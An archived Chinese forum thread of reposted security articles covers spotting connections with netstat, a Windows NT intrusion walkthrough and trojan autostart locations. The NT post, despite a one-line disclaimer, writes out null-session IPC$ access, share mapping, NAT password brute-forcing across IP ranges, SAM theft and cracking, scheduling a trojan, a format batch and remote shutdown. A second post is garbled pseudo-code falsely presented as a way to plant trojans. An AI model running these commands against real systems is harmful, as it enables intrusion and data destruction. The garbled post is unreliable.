光电工程师社区
标题:
可知谁正连上你的计算机
[打印本页]
作者:
suncon
时间:
2003-10-21 08:58
标题:
可知谁正连上你的计算机
可知谁正连上你的计算机
这个问题我也曾经想过,
有人说过,有的时候明明就没有在上网,为什么调制解调器的
灯号会亮个不停呢?
原来是因为有人在经过你的计算机,偷用你的帐号联机啊!
那么怎么样抓出来呢?
PcHome杂志有教过方法:
A.如果要看看有谁正在连自己的计算机的话,可以利用
Windows内建的网络监控程序。
方法如下:
开始--程序集--附属应用程序--系统工具--网络监控软
体--按Enter。
此时跳出来的是窗会告诉你有谁正在联机你的计算机,在右
边还会显示出他正在分享你的甚么资料,不喜欢的话,不
要客气,就把他给断线吧!
如果找不到这个程序,那么先去「我的计算机」--控制台--
新增移除程序--Windows安装程序--系统工具--详细资料-
-将网络监控程序打勾--确定--放入Windows光盘安装完
毕!
B.另外还有一个方法,就是上面大大所说的键入命令字
元,
这个方法不仅可以看出有人在连自己的计算机,还可以把他
的ip给找出来,
不过当然他要是固定的ip才可以抓到啦
方法如下:
1.先看看有没有不认识的连在自己的计算机上:
win98:开始--关机--进入MS-DOS模式
winMe:开始--程序集--附属应用程序--Ms-DOS模式
键入「netstat」,此时在Foreign Address下面会出现所有连
到自己计算机上面的名称。
举例来说: Grace:5438 代表有个计算机名称叫做Grace的经由
5438这个连接端口连上自己的计算机,
由于不认识此人,故认定他是骇客。
2.接着再把秘密客的ip找出来:
接着继续键入「netstat -n」,此时Foreign Address下方出现
的就是ip位置了。
举例来说: 140.112.2.100:5438 瞧!那个从5438连进来的家
伙,ip位置就是140.112.2.100 (这是台大椰林风情BBS的位
置啦,借来说明一下..^^),
现在把这个ip位置给记下来。
3.最后我们来查一下这人到底是谁:
进入台湾网络信息中心的网页
http://www.whois.twnic.net.tw/
输入刚刚那个ip查询一下,就出来相关的资料了!
netstat参数 (大陆文章)
netstat参数--qqw转移
-A 显示任何关联的协议控制块的地址。主要用于调试
-a 显示所有套接字的状态。在一般情况下不显示与服务器
进程相关联的套接字
-i 显示自动配置接口的状态。那些在系统初始引导后配置
的接口状态不在输出之列
-m 打印网络存储器的使用情况
-n 打印实际地址,而不是对地址的解释或者显示主计算机,
网络名之类的符号
-r 打印路由选择表
-f address -family对于给出名字的地址簇打印统计数字和控
制块信息。到目前为止,唯一支持的地址簇是inet
-I interface 只打印给出名字的接口状态
-p protocol-name 只打印给出名字的协议的统计数字和协议
控制块信息
-s 打印每个协议的统计数字
-t 在输出显示中用时间信息代替队列长度信息。
netstat命令的列标题
Name 接口的名字
Mtu 接口的最大传输单位
Net/Dest 接口所在的网络
Address 接口的IP地址
Ipkts 接收到的资料包数目
Ierrs 接收到时已损坏的资料包数目
Opkts 送出的资料包数目
Oeers 送出时已损坏的资料包数目
Collisions 由这个接口所记录的网络冲突数目
作者:
suncon
时间:
2003-10-21 08:59
标题:
可知谁正连上你的计算机
入侵计算机?
不一定要用电子邮件的方式才能入侵计算机
1.JAVA或C++程序系统内打入函数数组式
//Program9.8 `Sort’’ of 你的IP PS.SORT意指函数
2.再加入参数
longlarge(你的IP) of const a for\pue
3.释放内存
c://open Fat32
4.打开assert宏
//Program 10.7 Demonstrating assrtions
#includeiostream
#includecassert
5.进入你所属的ISP系统
6.在系统内以
x=0 y=5
以函数类推
7.强制你的帐号灌入木马
8.当你拨接或打开cable时
无形中你就中了木马
9.我就可以对你的计算机动手了
不用寄信的方式让对方中木马!
对方不用直接执行木马服务器,只要一上网就让他的帐号强制灌入木马!
作者:
suncon
时间:
2003-10-21 09:00
标题:
可知谁正连上你的计算机
黑客入侵Windows NT的「武器库」
编者:文中为大家所讲解的内容是为了让更多的人了解黑客的攻击手段,以便更好地防范黑客,针对黑客手段对系统进行
更安全的设置,读者不得将此用于非法用途。
大致说来,黑客入侵Windows NT的原理和入侵Win95/98差不多, 因为NT同样是使用NetBIOS Over TCP/IP ( NBT )的技术, 而
且应用范围比Win95/98 更广泛。以下是几种黑客入侵Windows NT的方法, 让我们也窥探一下黑客的「武器库」吧。
方法一、 使用空密码联机
现在假设目标计算机的IP地址是202.64.161.X (X为任选数字), 先使用nbtstat 指令查看对方NT的网络数据:
nbtstat -A 202.64.161.X
如果看到20 的字样, 那么此NT系统可能将自己计算机数据共享出来。其实在NT安装后, 会将计算机上的驱动器都共享出来, 没
错, 是自动共享出来的! 不过只是隐藏了, 所以你未必会看得见。而很多人在安装好NT后未做任何设置便即使用, 这正好给黑客
一个入侵的大好机会。随后黑客就会使用Net View 指令看看这个IP 地址:
net view \\202.64.161.X
正常来说会出现系统发生 System error 5 has occurred 的字样。这就是NT比Win95/98 安全的地方! 如果是Win95/98 , 只要使用
net view 指令就可以看到对方计算机所有共享出来的资源, 如果是NT就一定要登录进入NT服务器才可以用net view 指令。但黑客并
没有对NT服务器的帐户, 又怎样登录呢? 其实NT有一个很大的漏洞, 它有一个ipc$( Inter-Process Communication: 进程间通讯 ) ,
其同样是隐藏共享, 作为服务器与服务器间的沟通, 只要连接到对方的IPC, 便有机会入侵了。他会先用null password ( 空密码, 即
是没有密码! ) 来试试, 手法如下:
net use \\202.64.161.X\ipc$ 「 」 /use:「 」
以上的「 」 是空密码的意思, 如果连接上会看见「指令执行成功」的字样。接着便再用
net view \\202.64.161.X
然后便可以看到对方所有共享出来的资源了。
接着黑客会用net use 指令, 把对方共享出来的资源映像成自己的网络驱动器, 之后想怎样用就随心所欲了。如果对方没有把
隐藏共享取消, 黑客可以用以下指令:
net use X: \\ip地址\c$
那对方的C 盘便会变成自己的X 盘了, 不过这方法未必一定可行, 因为NT服务器安装了Services Pack 3 或以上版本, 用空密码
连接IPC$ 的权限被限制, 不能够映像NT上的驱动器 , 这时便要使用下一个方法。
方法二、使用NAT工具
如果用空密码进入NT服务器没有收获, 黑客们也不会绝望。黑客可以尝试使用其它帐户的密码来进入。如何知道NT服务器
的帐户? 那当然是猜啦! 其实NT的密码不是想象中困难, 而是比想象中更易, 而这些大多是人为的错误。
首先需要一个NAT的程序, NAT全名是( NetBIOS Auditing Tool ) , 可以自动联机到NT服务器, 并猜对方帐户的密码, 这是
Internet上黑客入侵NT的必备「武器」。
Essential NetTools 是一个专门检查NT漏洞的NAT 套餐, 它的功能非常强劲, 先来看看它的几个主要功能。
1. NB扫瞄
NB扫瞄 可以一次性替你扫瞄 Internet 上计算机的IP, 如果你上网的速度够快, 不用一分钟便可以扫瞄 整个Class C 的IP , 之后它
会列出那一段IP地址内所有计算机的NetBIOS数据, 作用和黑客用nbtstat指令一样, 不同的地方就是不用逐一测试, 节省不少时间。
2. NATShell
NATShell 是用暴力破解的方法尝试登录入NT服务器, 只要把目标的IP 地址输入NATShell 的窗口, 便可以开始了。可能你以
为「强攻」会很难, 但根据经验, 有4成以上的NT都可以轻易攻入, 什么原因呢? 因为人懒之故。
3.LMHosts
用NB扫瞄到目标后, 可以选「Add all items to LMhosts 」项, 便会将对方的IP 及计算机名称自动加在计算机的lmhosts文文件内, 以后
你可以用「查找」→「计算机」, 找到对方的计算机, 非常方便。
好了! 决定了要检查的目标后, 在NATShell填上它的IP 地址, 等待一段时间, 便可以看看结果-- NATShell的报告。
NATShell 会不断用不同的用户名 (userlist.txt) 及密码 (passlist.txt) 来登录进入NT服务器( 当然你可以自己再编辑这两个文件)
。如果成功连接, 便会有红色的warning 字句出现, 并且列出该NT系统 的用户名 和密码 。
例如找到NT的Administrator(管理员)的密码是admin 。便会尝试在DOS下打:
net use x: \\IP 地址\c$ /user:administrator admin
便成功地把此NT系统隐藏的C区映像成自己计算机的某个盘了!
如果在NATShell 的报告是所有的共享都有c onNECTED with name: *SMBSERVER 的字样, 即是说NT连密码都没有设定, 如
果是密码, 还要打入:
net use x: \\IP 地址\c$ /user:administrator
便可以把NT的C 驱动器映像成自己的某个磁盘了。如果被黑客知道了管理员的帐户, 基本上黑客以后出入如走平地, 整台
NT都会被黑客操控。
NAT 批量扫瞄法:
因为Essential NetTools 每次只可以扫瞄一台NT的密码漏洞, 效率实在太低了。为了使入侵更有效率, 黑客可以使用NAT的批
量扫瞄法。
在Essential NetTools 的目录下有一个nat.exe 的文件, 是可以直接在DOS 状态下执行, 方法是:
nat -o result.tst -u userlist.txt -p passlist.txt 202.64.161.1-202.64.161.254
那么nat 程序便会根据用户名称文文文件( userlist.txt ) 和密码文文件( passlist.txt ) 来登录进入202.64.161.1 到202.64.161.254 的主机
范围, 并会将结果存在result.txt 上。
方法三、 检查NT的密码
用Essential NetTools 可以用不同的户名称及密码文文件来登录进入NT服务器, 如果直接得到管理员的帐户, 就证明这台NT服务
器的安全程度低得可怜!
如果只是得到一般的帐户的密码, 虽然权力不大, 但也不代表这部NT是安全。例如黑客可以用一般帐户的密码登录进入NT
服务器, 然后用Copy 指令, 将NT的密码文文件拷到自己的计算机中。
不过NT的密码文文件(SAM , 文件位置在\Winnt\System32\c onfig ) 的系统激活时是只读的, 不可以复制, 不过还有另一个文件,
就是在\winnt\repair\ 的目录中的sam._ 文檔。
Sam._ 是什么文档? 通常在安装NT时都会制作系统恢复盘 , 遇到NT有问题时, 便可以用系统恢复盘 进入NT, 而sam._ 便是sam
密码文文件的「副本」。只要将sam._ 拷到计算机上, 便可以用其它程序来慢慢破解密码了。在DOS 状态下执行复制:
copy \\202.64.161.X\admin$\repair\sam._ c:\
便会把sam._ 文檔拷到自己的C 盘内。如果目标计算机忽略了sam._ 的重要性, 没有设定好文件的权限, 便为黑客提供了大好机
会了。
如何解开SAM 密码文文件:
NT的系统密码是用单向散列( Hash ) 来处理过, 完全看不出源密码, 理论上要还原成源密码机会不大, 这些编码会放在SAM (
Security AccouNTManager ) 数据库内, 可以用一个专门破解NT密码的程序--- L0phtCrack 来破解。
它是Internet 上非常有名的检查NT密码工具, 它会用各种可能的密码, 反复仿真NT的编码过程, 并将编出来的密码与SAM 数
据库的密码比对, 如果相同, 就会得出密码了, 黑客可以借此入侵NT的系统! 先将sam._ 用extract 指令解开, 在DOS 状态下打:
extract sam._ sam.txt
执行L0phtCrack , 在File Import SAM file 输入sam.txt ,在Tools Start Crack 便会开始解密。
如果NT的密码是一些数字或人名, 用L0phtCrack 不用十分钟便可以解开!有人曾用一台Pentium II 的计算机, 只用一日时间便完
全解开管理员和其它帐户的密码。
但以上这些指令和工具都有限制的,就是只可以显示NT服务器的隐藏共享、已登录进入系统的用户名称,数据不够详细,以下黑客
用的NTInfo扫瞄就可以进一步检查NT服务器的漏洞(也适用于Windows 2000)。
1. 用户数据一览无遗的NTInfo扫瞄
为了进一步了解目标计算机的安全性, 黑客需要使用一个超小型的工具NTInfo扫瞄 , 它只有69 KB , 但比Essential NetTools 更强
劲! 只要执行它, NT服务器的隐藏共享 、用户帐户名称、域名都会一览无遗, 可以让黑客深入了解该台NT服务器的漏洞! 只要在
DOS 状态下下执行:
ntis -n IP地址
之后NTInfo扫瞄便会列出一个详细的报告( HTML 文檔) , 包括所有共享的资源( 包括了隐藏的) 、共享的名称、所有NT服务
器内的帐户数据, 例如用户帐户名称、是否可以游客身份登录、多久没有更改密码等。而最强悍的地方是NTInfo扫瞄 ,它会自
动检查NT服务器内帐户密码是否足够安全, 例如检查用户名称和密码是否一致、或者有没有使用密码等。
2. NTResource Kit 帮助入侵
如果大家的NT服务器安装了NTResource Kit 4.0 , 你会发觉这个工具非常有用。NTResource Kit 可以算是NT服务器的辅助工
具, 可以帮助网络管理人员管理NT和遥控处理NT的工作。不过内里有几个程序常会被黑客利用来入侵NT的计算机。
(1) . 共享资源的Net Watch
如果有黑客使用上述介绍的方法来进入NT服务器, 便有机会为所欲为了!
只要使用Resource Kit 的Net Watch 便可以连接对方的计算机。在c onnection / Add Computer 输入计算机的IP 地址, 隔一会便
会出现对方计算机共享出来的资源。Manage Shares 会显示对方的共享目录, 只要按 添加共享资源 便可将对方计算机整个硬盘都
共享出来, 并且将权限设为Everyone, 这便使得日后的攻击更方便了。
(2) . 监视程序的Process Viewer
NTResource Kit 提供了Process Viewer , 它可以检视Local 和Remote 计算机直接在执行的程序。Process Viewer 可以监视NT服务器
的执行情况, 如内存和各种程序的使用情况。只要在Computer 输入对方计算机的IP 地址, 隔一会便会显示对方NT正在执行的程
序, 它可以杀死本地计算机的程序。
黑客如果要杀死远程计算机的程序也是有办法的, 只要使用一个名叫Pskiller 的小程序就可以轻易做到了! 先用Process Viewer 连接
NT计算机, 知道这台计算机正在运行什么程序, 之后便可以用Pskiller 来杀死。用法很简单, 在DOS 状态下输入:
pskill \\ 计算机名称或IP地址-u roland -p xyz
-u roland : 是用户名称/
-p XYZ:进程中的计算机或ID
(3). 定时控制的netsve
netsvc 是一个小小的程序, 可以用来激活NT的服务, 如schedule(进度表)等, 通常是黑客用来遥控执行NT服务器的某个程序,
先将netsvc 拷到对方的NT内:
copy ntsvc.exe \\IP 地址\admin$\system32
然后再输入:
netsvc \\IP 地址schedule /start
这便可以激活该计算机的schedule 服务。
然后便把一个木马或病毒程序( 假设是killer.exe ) 拷到对方计算机:
copy filler.exe \\IP 地址\admin$\system32
之后便可以用at 指令来设定schedule 的执行时间:
at \\IP 地址12:30 killer.exe
这样就可以在12:30 时自动执行killer.exe
如果遇到一些「辣手」的黑客, 只要复合一个含有format 指令的简单批处理文件到NT服务器上, 校准时间, 便可以将对方的
NT清洗得一乾二净。
(4). 关闭NT的shutdown :
shutdown : 关了对方的NT服务器:
Shutdown \\IP 地址t:20
20秒后将NT自动关闭, 如果对方是大型网站可就惨了!
作者:
suncon
时间:
2003-10-21 09:01
标题:
可知谁正连上你的计算机
特洛伊木马?
木马,又名特洛伊木马,其名称取自古希腊神话的特洛伊木马记,它是一种基于远程控制的黑客工具,具有很强的隐蔽性和危
害性。为了达到控制服务端主机的目的,木马往往要采用各种手段达到激活自己、加载运行的目的。让我们一起来看看木马常
用的激活方式。
在Win.ini中激活
在Win.ini的[windows]字段中有激活命令“load=”和“run=”,在一般情况下“=”后面是空白的,如果后面跟着程序,比如:
run=c:\windows\file.exe
load=c:\windows\file.exe
这个file.exe很可能就是木马程序!
修改文件关联
修改文件关联是木马们常用手段(主要是国产木马,老外的木马大都没有这个功能),比方说正常情况下TXT文件的打开方式
为Notepad.exe文件,但一旦中了文件关联木马,则TXT文件打开方式就会被修改为用木马程序打开,如著名的国产木马冰河。
“冰河”就是通过修改HKEY_CLASSES_ROOT\txtfile\shell\open\command下的键值,将“C:\WINDOWS\NOTEPAD.EXE %1”改为
“C:\WINDOWS\SYSTEM\SYSEXPLR.EXE %1”,这样当你双击一个TXT文件,原本应用Notepad打开该文件的,现在却变成启
动木马程序了,好狠毒哦!请大家注意,不仅仅是TXT文件,其它诸如HTM、EXE、ZIP、COM等都是木马的目标,要小心
喽。对付这类木马,只能经常检查HKEY_CLASSES_ROOT\文件类型\shell\open\command主键,查看其键值是否正常。
捆绑文件
实现这种触发条件首先要控制端和服务端已通过木马建立连接,然后控制端用户用工具软件将木马文件和某一应用程序捆绑在
一起,上传到服务端覆盖原文件,这样即使木马被删除了,只要运行捆绑了木马的应用程序,木马又会被安装上去了。绑定到
某一应用程序中,如绑定到系统文件,那幺每一次Windows激活均会激活木马。
在System.ini中激活
System.ini位于Windows的安装目录下,其[boot]字段的shell=Explorer.exe是木马喜欢的隐蔽加载之所,木马通常的做法是将该句
变为这样:shell=Explorer.exe file.exe,注意这里的file.exe就是木马服务端程序!
另外,在System.ini中的[386Enh]字段,要注意检查在此段内的“driver=路径\程序名”,这里也有可能被木马所利用。
再有,在System.ini中的[mic]、[drivers]、[drivers32]这三个字段,它们起到加载驱动程序的作用,但也是添加木马程序的好场
所。
利用注册表加载运行
如下所示的注册表位置都是木马喜好的藏身之处,赶快检查一下,有什幺程序在其下:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion下所有以“run”开头的键值﹔
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion下所有以“run”开头的键值﹔
HKEY_USERS\.Default\Software\
Microsoft\Windows\CurrentVersion下所有以“run”开头的键值。
在Autoexec.bat和Config.sys中加载运行
请大家注意,在C盘根目录下的这两个文件也可以激活木马。但这种加载方式一般都需要控制端用户与服务端建立连接后,将
已添加木马激活命令的同名文件上传到服务端覆盖这两个文件才行,而且采用这种方式不是很隐蔽,容易被发现。所以在
Autoexec.bat和Config.sys中加载木马程序的并不多见,但也不能因此而掉以轻心。
在Winstart.bat中激活
Winstart.bat是一个特殊性丝毫不亚于Autoexec.bat的批处理文件,它也是一个能自动被Windows加载运行的文件。它多数情况下
为应用程序及Windows自动生成,在执行了Win.com并加载了多数驱动程序之后开始执行(这一点可通过激活时按[F8]键再选择
逐步跟踪激活过程的激活方式得知)。由于Autoexec.bat的功能可以由Winstart.bat代替完成,因此木马完全可以像在Autoexec.bat
中那样被加载运行。
“反弹端口”型木马的主动连接方式
什幺叫“反弹端口”型木马呢?作者经过分析防火墙的特性后发现:大多数的防火墙对于由外面连入本机的连接往往会进行非
常严格的过滤,但是对于由本机发出的连接却疏于防范(当然有的防火墙两方面都很严格)。于是,与一般的木马相反,“反
弹端口”型木马的服务端(被控制端)使用主动端口,客户端(控制端)使用被动端口,当要建立连接时,由客户端通过FTP主页空
间告诉服务端:“现在开始连接我吧!”,并进入监听状态,服务端收到通知后,就会开始连接客户端。为了隐蔽起见,客户
端的监听端口一般开在80,这样,即使用户使用端口扫描软件检查自己的端口,发现的也是类似“TCP 服务端的IP地
址:1026,客户端的IP地址:80 ESTABLISHED”的情况,稍微疏忽一点你就会以为是自己在浏览网页。防火墙也会如此认为,大
概没有哪个防火墙会不给用户向外连接80端口吧。这类木马的典型代表就是“网络神偷”。由于这类木马仍然要在注册表中建
立键值,因此只要留意注册表的变化就不难查到它们。
尽管木马很狡猾,善于伪装和隐藏自己,达到其不可告人的目的。但是,只要我们摸清规律,掌握一定的方法,还是能够防范
的。消除对木马的恐惧感和神秘感。其实,只要你能加倍小心,加强防范,相信木马将会离你远去!
欢迎光临 光电工程师社区 (http://bbs.oecr.com/)
Powered by Discuz! X3.2